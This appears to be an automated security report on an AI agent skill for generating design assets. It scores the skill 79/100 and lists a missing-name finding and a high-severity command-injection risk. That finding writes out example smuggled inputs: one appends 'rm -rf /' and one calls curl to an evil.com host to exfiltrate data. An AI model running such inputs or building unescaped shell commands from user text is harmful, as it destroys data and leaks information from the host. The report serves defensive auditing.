Trust Assessment
design-assets received a trust score of 79/100, placing it in the Mostly Trusted category. This skill has passed most security checks with only minor considerations noted.
SkillShield's automated analysis identified 2 findings: 0 critical, 1 high, 1 medium, and 0 low severity. The findings are "Missing required field: name" and "Command Injection via Unsanitized User Input in Shell Script Execution".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (2)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| HIGH | **Command Injection via Unsanitized User Input in Shell Script Execution.** The skill provides multiple bash scripts and command-line examples (`generate-app-icons.sh`, Android icon generation, `generate-favicons.sh`, ImageMagick, sips). These scripts and commands are designed to operate on user-provided file paths and other parameters. If an AI agent is instructed to execute these commands or scripts and directly interpolates unsanitized user input into the shell command string (e.g., using `subprocess.run(..., shell=True)` without proper escaping), a malicious user could inject arbitrary shell commands. For instance, an input such as `my_image.png; rm -rf /` or `$(curl http://evil.com/data)` could lead to the execution of `rm -rf /` or to data exfiltration by the underlying shell, compromising the system where the agent is running. While variables are quoted *within* the provided scripts, the vulnerability lies in the initial construction of the command by the LLM before the script is invoked. The AI agent must rigorously sanitize and properly escape all user-provided inputs before constructing and executing shell commands. This typically means applying a robust shell escaping mechanism (e.g., `shlex.quote()` in Python) to each argument, or avoiding `shell=True` altogether and passing arguments as a list to `subprocess.run` or similar functions. Consider using dedicated libraries or APIs for image manipulation instead of direct shell calls where possible, to reduce the attack surface. | LLM | SKILL.md:17 |
| MEDIUM | **Missing required field: name.** The `name` field is required for claude_code skills but is missing from the frontmatter. Add a `name` field to the SKILL.md frontmatter. | Static | skills/cmanfre7/design-assets/SKILL.md:1 |
Full report: https://skillshield.io/report/2ff4b3b80e8a1dcf